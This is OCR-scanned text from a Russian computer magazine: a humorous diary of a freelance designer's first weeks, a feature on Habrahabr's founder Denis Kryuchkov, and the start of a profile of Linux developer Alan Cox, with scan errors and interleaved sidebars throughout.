письмами поклонницы, заказчики и все-все-все... 




ЗАПИСЬ ВТОРАЯ 



Настроение: 



Песня ДНЯ: 



|оптимистичное 
[«Белые розы» 
выше среднего 



Наконец-то утро! Впрочем, с первых же его минут оно показалось мне не 
таким добрым, какхотелосьбы. Большинство друзей и знакомых, видя мои 
революционные изменения, чуть л и не в открытую крутили пальцем у виска. 
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Картина «Бурлаки на Волге»вХХІ веке эволюционировала в«Фрилансеры 
на диване: автопати после заказа» 



Иногда бывают времена, когда экономить приходиться на всем... 
даже на здоровье... 



Судя по глазам любимой девушки, всю прошедшую ночьона напевала пе- 
сенку «Атомули я дала?». Полный ІавЫоп, но врагу не сдается наш гордый 
«Варяг», и у меня много энергии и оптимизма, чтобы доказать всем и вся, 
что ітееіапсе как минимум жжот. Впрочем, как утро начнешь, та к день и про- 
ведешь. Ни на одной бирже с неба заказы на меня не свалились, поэтому 
маленькая доля сомнений у меня все-таки появилась. А можетзря яушел? 
«Все впереди — надейся и жди», хватит! Пора проявлятьактивность на 
рынке. Отписавшись в комментах по наиболее приличным проектам, я стал 
тупо ждать. И первая правда, с которой я столкнулся, была мягко говоря 
неприятной. Большинство гурудизайна уже имеютсвою базу клиентов, а 
между остальными происходит ожесточенная борьба, в которой выигрыва- 
ют не наиболее сильные профессионалы, а новички, которые элементарно 
демпингуютцены. 

Да-а-а... судя по всему, идею с переездом в мегаполис придется отложить 
до лучших времен. Хорошо, что есть небольшая заначка... 




ЗАПИСЫРЕТЬЯ 



Настроение 



Песня ДНЯ: 



в ожидании 
«Миллион долларов» 
средний 



А-а-а! Кто придумал эти развлекательные сайты? ВазЬ.огд.ги, Ые\л/52, 
блоги, форумы? Душой и сердцем чувствую, что надо пойти на очеред- 
ные поиски, но сэтой несобранностью все получается как в мультике про 
Винни-Пуха: «Они посидели еще часик, потом еще часик и еще часик». Эта 
свобода вкупе с оставшейся заначкой просто убиваютменя. Впрочем, от 
последнего пункта остается все меньше и меньше, поэтому близко то время, 
когда я стану питаться пельменями, дошираками и прочей неполноцен- 
ной едой. Мозгдаетсигнал, что, пожалуй, стоит сделать «восстановление 
системы», но вот гордость... 



Так вот. Пока во мне боролисьсилы добра и зла, а мозгежеминутно потреб- 
лял все новые и новые шутки, на почте появилось письмо-предложение 
от N студии дизайна. Мол, так и так, вы хороший специалист, сами неуспе- 
ваем, поэтому хотим предложить вам работу за проценты, даем договор... 
и прочая бла-бла-бла. Прочитав техническое задание, я был в шоке. В 
бывшей студии такую сумму я зарабатывал за пол месяца, а предлагаемый 
проектяйца выеденного не стоил, и сроки на него были более чем — неде- 
ля. Отправив согласие, без задней мысли я усмехнулся халявности фрилан- 
са, продолжая читать развлекаловки и мысленно готовясь кзавтрашней 
встрече сзаказчиком. 




ЗАПИСЬ ЧЕТВЕРТАЯ 



Настроение: 



Песня ДНЯ: 



Длучше всех 
|«Хали-гали» 
[^^^^Нвыше среднего :] 



О да, наконец-то я почувствовал себя настоящей VI Р- персон ой. Встреча, 
которая состоялась в одном из ресторанов, больше была похоже на свет- 
скую беседу или дружеский разговор. Ее логическим завершением стало 
подписание договора на разработку логотипа. Легкий бизнес-ланч оп- 
латил заказчик, а как он со мной сюсюкался, дотошно объясняя задание! 
Ты бы только видел! Как будто я как минимум Тема Лебедев. Еще одним 
сюрпризом со стороны клиента было предложение промотивировать мою 
музу 50% предоплаты. Ну разве я мог осмелиться отказать такому чело- 
веку? В итоге у меня куча времени, куча идей и хоть маленькая, но все 
же куча денег. С этим надо что-то делать. Ну, например, собрать друзей и 
пойти хорошенько отметить это дело. Будут онимнееще сомневаться, я 
им покажу кузькину мать! 

Обрадовав приятным известием близких, я продолжал пребывать в эйфо- 
рии от заключенной сделки. Гороскоп обещал мне сегодня удачу (да-да, во 



Биржи удаленной 
работы 

Именно отсюда ты будешь получать первое время львиную долю зака- 
зов: Алдлду.бгее-Іапсе.ги, уууулл/.лл/еЫапсег.пеТ. ѵ^тѵ.гаггаЬоФа.сот, 
\лдлду.шеЬрег5опа1.ги . 



Сайты, посвящен- 
ные ітееіапсе 

На этих ресурсах широко представлена тема удаленной работы: статьи, 
интервью, советы — все это будет интересно не только новичкам, но и 
старожилам ітееіапсе: ѵуллдл/.касІгоЕги. ѵ\алау. І тееіапсе. ги. ѵ\п/\пу.Те1еіоЬ.ги . 



ХАКЕР 01 /109/ 08 



► 081 









^ сцена 




что только не станешь верить на ітееіапсе), которую я собирался реализо- 
вать на все 100%. 

До рагіу оставалось несколько часов, и я, как профессиональный фрилан- 
сер, собирался израсходовать их как можно эффективнее. Впрочем, после 
размещения объявления о поиске менеджера желания делать по работе 
что-либо еще не обнаружилось. Все, не могу больше сидеть на месте — по- 
бежал собираться на «творческий вечер». 




ЗАПИСЬ ПЯТАЯ 



Настроение 



Песня ДНЯ: 



1 января 
«В клубе» 
страшно смотреть 



Я не помню, когда и какя проснулся, но руки первым делом на автомате 
полезли искать в кармане мобильник, чтобы позвонить шефу. Лишь в 
последний моментя вспомнил, что хозяину менятеперьодин и он сейчасс 
видом потрепанного бомжа смотритна меня иззеркала, пытаясьзаста- 
вить подойти к рабочему месту. Да, погуляли на славу... Да и деньтоже 
выдался продуктивным: до обеда проспал, потом до вечера занимался 
обсуждением вчерашней попойки и отхождением отнее, атам и спать 
опять пора. Ното ли в лунатическом порыве, то лиусилием воли я все-таки 
запустил РЬоІю зЬор. Единственное, что меня радовало, — идей в голове 
по-прежнему было выше крыши. Впрочем, кактолько я обнаружил, сколько 
у меня осталось от вчерашней предоплаты, вдохновение сразуже куда-то 
улетучилось... Ну а как же иначе? Муза, она ведь как девушка — ей нужна 
забота, ласка и стабильность. Какая нормальная муза будет верна тому, у 
кого, кроме запаха перегара, больше ничего нет? Грустно все это... грустно, 
товарищи... Несмотря нато что в душе стал зарождаться пессимизм и время 
работало против меня, я ствердой уверенностью решил: завтра основа- 
тельно возьмусьза работу и выполню этот заказ! 




ЗАПИСЬ ШЕСТАЯ 



Настроение: 

Пе^щднТЬ 



| полупессимистичное 
Прыгну со скалы» 



І^^^^Цна нуле 



Гуляя по квартире в поисках клада, поймал себя на мысли, что, кажется, я 
«эволюционирую» в Гену Букина. Да-да, и, что самое настораживающее, 
сходства налицо. Все попытки оседлать РНоІозНор и одолеть, казалось бы, 
простейший логотип оказалисьтщетными. Какбудто я первый раз сел за 
планшет... Но, как говорится, не было бы счастья —да несчастье помогло. 
Пока я в течение нескольких часов пытался сделать что-то хотя бы отдален- 
но напоминающее логотип, на мое объявление о поиске менеджера отклик- 
нулось несколько человек, среди которых был проведен жесткий кастинг. В 
итоге предпочтение я отдал специалисту слабого пола, и с каждого заказа 
буду отдавать ей 20%. Много, но выживаниетребуетжертв. Таким образом, 
я фактически подписал себя на еще как минимум один заказ сверху этого. 
Другого выхода у меня не было. Хотя... если нормально подумать... 




Настроение 



Песня ДНЯ: 



нормальное 

«Владимирский централ» 



а что это? 



«Я и сам бы вискас слопал, ладноуж, давай конфеты...»— ирония судьбы, 
но именно эта песня играла сегодня в маршрутке по дороге к моей девушке. 
Ты не представляешь, какя был рад семейному обеду! Только между нами: 
я ненавидел все эти посиделки, но все-таки пословица «Путь к сердцу 
мужчины лежитчерез его желудок» проверена временем и в очередной раз 
доказана, уже мной. На допросы родителей «Какуспехи на профессиональ- 
ном поприще?» я собирался поднять рюмку и грустно излить душу, что, мол, 
ху... , нотутже под столом получил ногой от подружки и резко исправлялся: 
«Ху. ..художественные дела идут в гору». Аж плакать захотелось... Может, я 
становлюсь Эмо? 

Я пришел домой сытым и веселым итолько собирался сесть за рисование 
великолепного логотипа, идей для которого у меня после обеда было хоть 
отбавляй, как на голову мне свалился еще один заказ. Кто мне скажет, 
какого ху... художника я дал добро менеджеру? 

Итог дня : нет денег, практически нет вдохновения. 

Вопрос дня : что делать? 




ЗАПИСЬ ВОСЬМАЯ 



Складывается такое впечатление, что деньги убывают не по дням, а по ча- 
сам. В поисковиках стали появляться запросы потеме «продолжительность 
жизни без продуктов», «смешной способ самоубийства» и прочий бред. 



Настроение 



Песня ДНЯ: 



хорошее 

«Знаешьлиты.. 



пополняется 
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Биржа удаленной работы ѵѵѵѵѵѵ.ѵѵеЫапсег.пеі 



У меня есть две новости: одна хорошая, ну а другая, естественно, 
плохая. Начну с обоих сразу. Ту халтур ку от менеджера благодаря моему 
режиму жаворонка я сделал еще до обеда — бюджетный дизайн сайта- 
визитки не доставил мне особых хлопот. Поэтому следующий после 
сдачи час я провел в ожидании, когда заказчик оценит и щедро оплатит 
мой труд. Закрыв глаза, я представлял, как скоро я снова попробую 
человеческую еду, как вот-вот наступит мой звездный час и на меня 
свалятся машины, квартиры и миллионы, но... Но сообщение в аську о 
том, что заказчик за платил, ноне полностью, вернуло меня с небес на 
землю. Обидно было до ужаса, но все-таки первый гонорар на хлеб я за- 
работал, а значит, у меня есть ресурсы на выполнение основного заказа 
на логотип. Немного отойдя от первых эмоций, я основательно засел 
за РЬоІовЬор. Нупочемуявпервыйжеденьне сделал эту гребаную 
работу? Вроде бы и идеи есть, и муза чувствуется, но из-за банального 
волнения ничего не получается. Каждый нарисованный эскиз идет в 
корзину. Ужас, но самое неприятное, что именно этотзаказ может пол- 
ностью решить мою судьбу как фрилансера. 



дЕШДЗ-ИЗШШ! 



Настроение 



Песня ДНЯ: 



боевое 
Макака 
ждем пополнения 



Думается мне, что если в доме были бы крысы и хоть какая-то еда, 
первые, даже не посмотрев на нее, уже бы сбежали. А как еще, когда 
на корабле творится паника и начинается бедствие? Дедлайн насту- 
пает примерно через сутки, ауменяещеконьне валялся. Все попытки 
нарисовать дурацкий логотип для идиотской компании даже не имели 
намека на успех. Впрочем, как говорится, надежда умирает последней. 
Поэтому было решено, отправиться на прогулку с целью зацепить сразу 
аж трех красоток: удачу, музу и вдохновение. Но то ли видуменябыл не 
такой, то ли еще что-то, ноне одна из них не обратила на меня никакого 
внимания. Вариант оставался один — накупить энергетиков и в бру- 
тальном режиме механически штамповать все возможные вариации. 
Но, как оказалось в дальнейшем, хорошим выходом из сложившейся 
ситуации этот вариант не был. А между прочим, уже была глубокая ночь, 
и никакие ред-булл ы и адреналин-раши в борьбе со сном уже не помо- 
гали. Глаза медленно закрывались, а мозг перешел на работу в ждущем 
режиме... 

...И о чудо! Проснувшись от дикого чувства голода, тело (да-да именно 
тело, если не туловище) поперлось к холодильнику и увидело там 



остатки салата в пластиковой баночке. Глаза остановились на нем и не 
моргая смотрели, наверное, минут пять. Затем после этой театральной 
паузы последовала немая сцена: вилочкой, нежно и аккуратно, как 
сапер разминирует бомбы, я стал укладывать остатки салата в баночке. 

О да! В скоплении протухших огурцов, яиц и майонеза я увидел идеаль- 
ный логотип для идеального заказчика! До сдачи проекта оставалось 
несколько часов, поэтому, не теряя ни секунды, я стал срисовывать с 
салата эскиз потрясающего логотипа. Два часа работы, данные — на 
флешку, и бегом на встречу, до которой оставался буквально час. 
Ровновназначенныйсрокя в помятой одежде с красными глазами и 
жутко потрепанным видом врываюсь все в тот же ресторан, где меня уже 
ждетзаказчик. Радостно поприветствовав последнего, я вручил ему 
единственный вариант логотипа, который просто-таки ввел заказчика 
в экстаз. 

«Потрясающая работа. В следующий раз дам вам больший срок, чтобы 
вы так не насиловали себя», — думая, что на разработку логотипа я 
потратил неделю, резюмировал мой теперь уже постоянный клиент. По- 
лучив вторую половину гонорара, я, усталый, но счастливый, поплелся 
домой отсыпаться и готовиться к новым подвигам, которых, думается 
мне, впереди будет еще очень много. 



НАРРУ ЕЫР 



Настроение 



Песня ДНЯ: 



отличное 
Лунная соната» 
ну о-о-очень большой : 



Ргееіапсе — это как наркотик: попробовав хотя бы раз вкус настоящей 
свободы, вернуться к «человеческому» образу жизни потом будеточень 
и очень сложно. После того заказа, который послужил дляменяещеи 
боевым крещением, я получал предложения вернуться на старое место 
работы, но разве я мог поменять экстрим, личный бизнес, авантюру на 
стабильность и серость? Конечно нет! Но, чтобы не повторять преды- 
дущих ошибок, я стал подходить к делу с большей ответственностью и 
серьезностью. И результат не заставил себя ждать: буквально через 
полгодика у меня сформировалась отличная база постоянных клиентов, 
уровень дохода сейчас в два раза превышает максимальную зарпла- 
ту дизайнера врегионе.ноио четком восьмичасовом рабочем дне 
пришлось забыть — он вырос до 1 2-14 часов. Тяжело? Да какая разница, 
ведь теперь я свободный человек. Попав по неопытности первый раз в 
плен свободы, в дальнейшем я смог поменяться с ней местами. Поэтому 
мне такая жизнь по кайфу! "а" 
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РАМАМ БА ХАРА 
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Стартап для 



ІТ-шников XXI века 



Интернет перестал быть простым хранилищем информации уже очень давно. Конеч- 
но, первые его пользователи посещали Сеть именно в поисках конкретной инфы, од- 
нако теперь все по-другому. Теперь Сеть доступна миллионам людей, которым просто 
интересно общаться. 



На основе материалов интервью с Денисом Крючковым 









сцена 



» 



ели не брать во внимание всевозможные форумы и доски 
объявлений, то первым сервисом, «соединяющим» людей, 
был ІіѵеЭоигпаІ. Наверняка, у тебя самого есть свой живой 
журнал. Однако У хоть и предоставил нескольким миллионам 
пользователей возможность выразить свои мысли и поделиться пережи- 
ваниями, все же не дал им удобных средств связи — не смог объединить в 
одно по-настоящему большое и по-настоящему единое сообщество. Что 
нужно сделать, чтобы твой блог читали и комментировали? Безусловно, 
нужно быть интересным человеком, умелым рассказчиком и быть втеме о 
том, о чем пишешь (если блогтематический). Ноэтого все равно будет мало. 
Блог надо раскручивать. Блогом надо заниматься. Проблема заключается 
в том, что это дело несколько более сложное, нежели чем регистрация на 
сервисе. Разными людьми проблема решается по-разному, в основном 
это простая рассылка линка на пост по контакт-листу ІСО, что, как прави- 
ло, не дает никакого результата. Довольно удачным решением проблемы 
стал сервис Яндекс. Блоги. Однако даже после его появления осталось 
ощущениетого, что не хватает какого-то связующего звена, а может, двух. 
Эти звенья нашел Денис Крючков — основатель и руководитель проекта 
Хабрахабр. 

Н РАМАМ БА ХАРА МАМБА РУ 

Хабрахабр — это не просто тематический блог-сервис. Заведя дневник, ты 
сможешь не только рассказывать о своих хакерских вылазках, выкладывать 
скриншоты своей берлоги и делиться последними новостями из мира ІТ, но 
и оцениватьдругих«хабралюдей», а они, в свою очередь, будут оценивать 
тебя. Если напишешь действительно интересный пост, то его обязательно 
«захабрят» (проголосуют«за»другие пользователи), он появится на глав- 
ной странице сервиса, тебя добавят в друзья сотни и тысячи пользовате- 
лей, карма и «хабрасила» вздуются до небес. А будешь писать чушь — «от- 
хабрят»: понаставят минусов, раскритикуют и сравняют карму еземлей. 

О карме. Если ты будешь писать хорошие посты и получать поддержку 
других пользователей, твои показатели авторитетности будут расти, а ты 
сам будешь постепенно приближаться к вершине —топу блоггеров. Как 
выразился основатель проекта, фишка втом, чтобы поддержкой других 
пользователей «прокачать себя». Хабрахабр позволяет размещать не 
только обычные посты, но и подкасты. Кстати, самый авторитетный блоггер, 
занимающий первую позицию, добился этого благодаря подкастам. 

Если уж речь зашла о показателях (карме, рейтинге-хабрасиле), то 
надо сказать, что рассчитываются они довольно хитрым способом. Как 
— такой же секрет, как и поисковый алгоритм Яндекса. «У нас очень 
много яндексойдов, которые занимаются оптимизацией под поисковое 
ранжирование. Мы даже шутим так. Говорим, что кармой и рейтингом 
мы ранжируем людей, которые, в свою очередь, пытаются заниматься 
ранжированием сайтов», — шутит Денис Крючков. Какя уже сказал, 
Хабрахабр — тематический проект. Это нето место, где ты можешь 
рассказывать о своих пижонских похождениях, не связанных с ІТ, или 
расписывать свой день по часам. На Хабре пишут об ІТ и только. «Если на 
проекте девочки будут обсуждать новые колготки или духи, то со време- 
нем образуется аудитория девочек, которым нравится читать про новые 
колготки и духи», — делится своим мнением основатель стартапа: «Есть 
штатная редакция, которая работаетудаленно и члены которой живут в 
разных странах. Редакция выступает в роли людей, задающихтон. Тон не 
в смысле атмосферы, а тон в смысле направления (тематики), в котором 
следует излагать свои мысли». 

Среди пользователей — какобычные айтишники, так и сотрудники и руко- 
водства крупных компаний: отхостинг-провайдеров до поисковых систем. 
Был замечентам и знаменитый ІТ-менеджер Игорь Ашманов (когда-то 
поднимавший Рамблер). 




Для многих своих пользователей Хабрахабр не просто блог-сервис. Это 
местообщения с единомышленниками. Ведь именно здесь можно нетоль- 
ко из первых рук получить достоверную информацию о событиях из мира 
ІТ, выслушать комментарии авторитетных людей, выразить свое мнение, 
поделиться впечатлениями, но и оценить новость или статью и ее автора. А 
главное — в отличие от обычных блог-сервисов, по-настоящему интерес- 
ный авторздесь не потеряется. Лучшие посты, одобренные читателями, 
попадают на главную страницу, что обеспечиваетеще больший приток 
читателей, массовое добавление автора в друзья и повышение авторитета. 
Но бывает и по-другому. Бываеттак, что сообщество по каким-то причинам 
отвергает людей за глупые сообщения или неадекватное поведение. Кто-то 
мирится с этим и уходит, а кто-то «встает на тропу войны» и продолжает 
заниматься всякими глупостями. Каксказал Денис Крючков, атаки на отказ 
в обслуживании — ББоз — проводятся сзавидной регулярностью, однако 
особых проблем для проекта этими атаками злоумышленникам создать не 
удалось. Инициаторами ББов-атак как раз и являются отвергнутые пользо- 
ватели, затаившие на сообщество зло и жаждущие мести (читай: лузеры). 



Стартапы 




ИСтартапом называют зарождающийся проект, который, по мнениюД 
Дего авторов, должен выстрелить, либо уже выстрелил. Сейчас, как ты И 
знаешь, в рунете, да и вообще в глоб альной сети, настоящая эпидемия 
Д — каждый хочет найти идею, которая принесет золотые горыТКакД 
Дгрибы после дождя появляются блоги, рассказывающие о ѴѴер2ЮиД 
Дстартапах. Очень популярны зиссезз 5Шгу — истории успеха о томТИ 
Дкак другие люди придумали и воплотили в жизнь идею, принесшуюД 
Дим миллионы. В последнее время заговорили о таком стартапещсакД 
ДРасеВоок. Правда, это, скорее всего, связано со скандалом вокруг него: | 
снователя этого проекта обвиняют в краже идеи — как видишь, вок-| 
очные страсти. 



^^ц’очные^щ 



том, какие российские стартапы можно назвать наиболееперспек- 
ивными, ] [, пользуясь случаем, спросил у Дениса Крючкова: «Есть^таІ 
Едва выстреливших стартапа!Этосаитыооп^а55пікі.гииѵкощЖе!Д 
ш. Можно сказать, что они появились из ниоткуда и буквально за год 
Інабрали огромную аудиторию. Для того чтобы набрать такуюаудитсъД 
ию, другим компаниям, к примеру КатЫег или Маіі.ги, потребова- 



ЛИСЬ годы 



^по^эногщща 



идея -> поиск инвестора -> реализация. В качестве инвесторов обычно | 



выступают венчурные фонды или так называемые «бизнес-ангелы». 

такие крупные суммы, как венчурные фонды: 5-15 миллионов рублей Щ 
Дпротив сумм в десяток раз больше. Как сказал Денис, в основномД 
Динвесторьыіросятблокищ 

Д25% + 1 акция. Это обусловлено тем, что инвесторы хотят иметьхотьД 
Дкакие-то инструменты влияния на развитие проекта и общииходдежД 
ДЧто же касается перспективности различных направлений, топред^Д 
Длагаю послушать, что об этом думает наш сегодняшний собеседник — Д 

могут существовать автономно и поддерживаться своими членами ». К | 
І Ислову. В ближайшее время Денис планирует запустить сразу несколько | 
новых проектов. К сожалению, подробности он раскрывать не стал, но 
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На премии РОТОРХабрахабр был отмечен каксообщество года, а его осно- 
Д вател ь — ка к луч ш и й продюсер| 



НА НАЧИНАЛОСЬ ВСЕ С ТОГО, ЧТО... 

По приглашению друзей в столицу из Пензы приезжает молодой дизайнер 
Денис Крючков. Уже тогда, в далекие 90-е, он был известен каксоздатель 
знаменитого портала «Вебпланета». Первое время проживания в Москве 
Денисзанимался дизайном и поддержкой Вебпланеты. Но вскоре продал 
портал и хотел приступить к воплощению своей старой задумки — проекта, 
позволяющего простым пользователям нетолько комментировать новости 
и статьи, написанные редакцией, но и самим выступать в роли журналис- 
тов. Именнотаким образом планировалось перестроить Вебпланету. Но не 
срослось — попытка объяснить идею акционерам успеха не имела. 

Тогда Денис решил создать новый проект. Дизайн и интерфейсы были 
сделаны довольно быстро — Денис взялся за них сам, а вотс програм- 
мной частью все оказалось сложнее. Не имея никакого желания изучать 
языки программирования, для работы над проектом он пригласил давнего 
приятеля. Но время шло, а результата не было. Программист не спешил 
с работой, порой позволяя себе абсолютно безответственные поступки: 
могуехать в совершенно другой город отдыхать со своей девушкой. «Это 



были самые долгие и самые странныетри месяца ожидания», — вспоми- 
нает Денис. Горе-кодера он прогнал и взял на его место другого. Прогресс 
заметно ускорился, и уже через месяц была готова бета-версия Хабра- 
хабра. К этому моменту уже было зарегистрировано юридическое лицо 
«ОООХабрахабр». Каки перед многими стартаперами, встал финансовый 
вопрос. Однако особой остроты он не имел — личные средства, поддержка 
родителей и банковский кредит позволили полностью сосредоточиться над 
будущим проектом. А некоторое время спустя стартапом заинтересовались 
инвесторы. 

Кстати, откуда взялось это диковинное словечко — «хабрахабр», допод- 
линно неизвестно. По одной из версий, здесьзамешан популярный блог 
йігіу.ги. Периодически этот небезызвестный проект меняет приветствие, 
которым встречает пользователей. Одним изтаких приветствий и была за- 
мысловатая последовательность звуков. Какточно она звучала, уже никто 
не помнит, но, скорее всего, именно она и легла в основу названия буду- 
щего стартапа. Такэто или нет, уже неважно, но в один прекрасный момент 
сочетание звуков «хабрахабр» всплыло в голове именнотого человека, 
которому и пригодилось больше всего, — Дениса Крючкова. 



Денис Крючков : 
профайл 



Родился в семье военных. Вслед за отцом-офицером постоянно менял 
Вместо жительства — учился в пяти школах, в среднем по 1-2 года в каж-| 
Идой. Именно в это время Денис приобрел важное качество — умение Щ 
определять, кто есть кто. Постоянная смена коллектива научила его 
Івидеть лидеров и аутсайдеров. Как говорит он сам, «получилосьнеД 
|сразу», н о частая смена школ позволяла совершенствовать навыки. 

I Умение определять характер, положительные и отрицательные сторо- 
ны человека, здорово пригодилось при отборе будущих сотрудников 



Д і; Ь&ім ШШВ 



Школу окончил с тройками, хотя многие^шітеля считали его одарен- 
ным ребенком. Хороших результатов достиг в тех предметах, которые 

ехническими дисциплинами дело обстояло несколько иначе — ал- 
гебра и геометрия не производили на будущего стартапера абсолютно 



После окончания школы поступил в Рязанский институт психологии. 
Понял, что не для него. Ушел с четвер'^^^црса и с головой погрузился 
в интернет. Кстати, со Всемирной паутиной познакомился после того, 
как родители подарили ему первый компьютер — Р 13 3 с 8 Мб опера- 
ивной памяти. По счастливому стечению обстоятельств, в компьюте- 
е оказался диалапный модем, которому довольно скоро было найдено 
применение. Вскоре Денис создал свою первую веб-страницу и заки- 
ул ее на хостинг своего провайдера. Это был юмористический проект. 
&акт, что его творение посещает большое количество пользователей, 
произвел огромное впечатление. После этого остаться в стороне от 
интернета Денис уже не мог. 



0 ВОСХОЖДЕНИЕ 

СейчасХабрахабр — огромное сообщество, насчитывающее больше 20тысяч 
пользователей, из которых чуть меньше Ютысяч являются активными чле- 
нами. В деньстраницыХабрахабра читаетболышебОтысяч айтишников. Как 
жеудалосьдобитьсятакой популярности? Очень интересното, что Хабрахабр 
никогда не рекламировался за деньги. Все начиналосьспонтанно: команда 
разработчиков рассказала о проекте своим друзьям. Друзья поделились 
информацией со своим окружением — сарафанное радио, каксказал Денис 
Крючков, самый мощный инструмент пиара: «Если ты делаешь по-настоя- 
щему качественный проект, с идеей, функционалом и в красивой обертке, 
пользователи не пройдут мимо. Они обязательно захотят рассказать о проекте 
своим друзьям и вместе с ними влиться в сообщество». Кстати, «сарафанное 
радио» — распространение инфы от одного человека кдругому. Слухи, в хоро- 
шем смысле слова. Нетрудно догадаться, почемуэтотакназывается. 
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Но нетолько сарафанному радиоХабрахабр обязан быстрому старту. Друзья 
основателя в знакуважения разместили рекламу на своих проектах. Среди 
поддержавших были Антон Болотов (из Мембраны), проекты Абте.ги и 



пердунами. Они застряли в 90-х. К примеру, Алекс Экслер, который всю 
свою жизнь ведет домашнюю страничку Алекса Экслера, пользуется боль- 
шим авторитетом в этом сообществе. Однако для меня он авторитетом не 
является. Вот Аркадий Волож, генеральный директор компании «Яндекс», 
является для меня авторитетом. Но он не принимает никакого участия в 
голосовании и отборе проектов. То, что Хабрахабр признали сообществом 
года, мне приятно, но мне было бы еще приятнее, если бы это сделало более 
профессиональное сообщество». 

^ КОГДА УЖЕ ТАК МНОГО СКАЗАНО 

В этой статье я неслучайно решил уделить большое внимание основателю 
Хабрахабра и процессу становления проекта. Не просто та к я рассказал 
тебе и о стартапах. Попав на Хабрахабр, очень быстро заражаешься идеей 
поднятия собственного проекта. Сам Хабр, будучи ярким примером успеш- 
ного стартапа, располагает кэтому. Так что скорее отрывай свою хакерскую 
задницу от дивана и ступай на Хабр учиться делать стартапы, □с 



Оігіу.ги, где баннеры стартапа висели довольно долгое время. Эта подде- 
ржка не была забыта, и, послетого как на Хабре образовалась своя аудито- 
рия, на его страницах была размещена реклама дружественных проектов, 
поддержавших сервис в самом начале. 

Весна 2007 года. Домашние страницы, форумы, блоги — все говорято ка- 
ком-то стартапе с очень странным названием. Поначалу не все обращали на 
это внимание, но, послетого как ряд весьма интересных блоггеров открыл 
свои «филиалы» на проекте, какминимум разобраться, в чемтутдело, 
захотели уже все. Шумихи вокруг стартапа не могло не заметить сообщес- 
тво интернет-деятелей ЕЖЕ, которое дважды отметило его в ежегодной 
премии РОТОР: Хабрахабр был признан лучшим сообществом 2007 года, а 
основатель и руководитель проекта Денис Крючков — лучшим продюсером. 
Это был успех. 

Однако, каксчитаетсам победитель, успех в признании не сообществом 
ЕЖЕ, а пользователями: «Я был полностью уверен, что Хабрахабр будет 
иметь успех. Я был уверен потому, что пятилетний опыт работы над Веб- 
планетой подсказывал, чего хотят пользователи. Однако я не рассчитывал 
на то, что аудитория проекта будет расти такими темпами. Семьтысяч посе- 
тителей — вот сколько людей планировалось привлечь в проекте первый 
год. Но пришло гораздо больше». Что же касается РОТОРа, то кнему Денис 
относится весьма скептически: «Я не считаю результаты премии РОТОР 
репрезентативными. Люди из сообщества ЕЖЕ, голосующиеза проекты, не 
являются для меня авторитетами. Таких людей я иногда в шутку называю 
старыми пердунами. Потому что порой они действительно кажутся старыми 



Хабрахабр - мой 
любимый ресурс. 
Каждый день захожу 
читать. Интересно! 






Да, отличный русско- 
язычный пример того, 
насколько качествен- 
ным может быть бес- 
платно создаваемый 
энтузиастами контент. 
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іеннои персоной ^ Т 



убрати внимание на стикер на 
крышке ноутбукаД 



ЫпихѴѴогШ Ехро 2005 
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Х-РгоМе 

Алан Кокс 



МАРИЯ «МІРВІ1Ш» НЕФЕДОВА 

/ МІГШШЗШООІСК.К1І / 



Имя: Алан Кокс (Аіап Сох) 

Возраст: 39 лет 

Место проживания: Суонси, Южный Уэльс, Великобритания (Бѵѵапзеа, ѴѴаІез] 

Место работы: Веб Наі 

Награды: Ргее ЗоНѵѵаге Аѵѵагб, ЬіпихѴѴогШ 



Талантливый программист и известный деятель в области свободно- 
го ПО Алан Кокс родился 22 июля 1968 года в городе Солихулл, что в 
Великобритании. Образование он получил в Университете Уэльса в 
городе Суонси (11піѵегзі!у о! ѴѴаІез, Зѵѵапзеа) и в Аберистуитском универ- 
ситете (11піѵегзі!у о! ѴѴаІез, АЬегуз!\л/у!Ь). Ну а так как студенты — народ 
бедный, Кокс во время учебы подрабатывал в Суонси на кампусе. 

Именно там в порядке эксперимента он и произвел установку одной из 
самых ранних версий І_іпих на университетскую сеть компов. Это была 
практически первая установка системы на рабочую компьютерную сеть, 
которая, разумеется, выявила множество недочетов, багов и неисправ- 
ностей в сетевом коде. Кокс лично взялся все это править и в процессе 
переписал большую часть сетевой подсистемы. Дело у Алана пошло так 
хорошо, что он влился в стройные ряды разработчиков Ыпих, став одним 
из основных девелоперов. Он проделал большую работу. Поддерживал 
ветку 2.2 и свою собственную — 2.4, которая обычно помечалась буквами 
«ас», например «2.4.9-ас». Как нетрудно догадаться, «ас» — инициалы 
нашего героя и «по совместительству» его никнейм. Ветка 2.4 отличалась 
очень высокой стабильностью и содержала багфиксы. 

За Коксом закрепилась репутация «второго в команде» после самого 
Линуса Торвальда. Он часто отвечал на вопросы в почтовой рассылке для 
разработчиков Ыпих — Ыпих кегпеі таіііпд Ііз!. Рассылка, надо заметить, 
весьма активная — начитывает в среднем 200-300 сообщений в день, так 
что времени Кокс не жалел. Однако потом в связи с учебой ему пришлось 
от всего этого отойти, ведь невозможно быть в двух местах одновременно. 
Одно из самых ранних детищ Кокса — это МІЮ — АЬегМІЮ. МІЮ, по 
сути, есть не что иное, как текстовая тгтюгрд. Дело было в конце 80-х 

— начале 90-х годов, и АЬегМІЮ стал первым интернет-МІЮ'ом, при- 
обретшим широкую популярность. Над игрой работала группа студентов 
Университета Аберистуита — отсюда и название, представляющее собой 
сокращение от имени их учебного заведения. И довольно интересный 
момент — АЬегМІЮ жив и по сей день. Он сменил порядка 20 версий, 
там можно найти от силы пару игроков, но факт остается фактом. 

Сегодня же Кокс работает в компании Неб На! (по-русски «красная 
шляпа»), которая хорошо известна как крупнейший дистрибьютор Ыпих 
ОС. В ней насчитывается 27 подразделений по всему миру, а в штате чис- 
лится более 1700 сотрудников. Реб На! знаменита такими продуктами, как 
корпоративная ось Реб На! Еп!егргізе Ыпих (на основе ѲКІІІ/ипих), дист- 
рибутив Ребога Соге, на котором обкатываются всяческие нововведения, 
софт и тому подобные вещи. А после покупки компании бВозз, производя- 
щей серверные приложение с открытым кодом, Реб На! стала еще и одним 
из серьезнейших игроков рынке корпоративных операционных систем. 
Параллельно со всем этим Кокс успел принять участие в таких небезыз- 
вестных проектах, как ѲЫОМЕ и Х.Огд. ОЫОМЕ — среда для рабочего 
стола, ориентированная на ІЛМІХ-подобные ОС. Лучше всего суть проекта 
отражает заявление с официального сайта 6КІ0МЕ: «Проект 6КІ0МЕ 
предоставляет две вещи: рабочую среду 6КІ0МЕ, интуитивно понятную 

и привлекательную для пользователей, и платформу разработки 6КІ0МЕ 

— обширный каркас для создания приложений, интегрируемых с рабо- 
чей средой». Стоит отметить, что разработку СЫОМЕ в 1997 году начал 
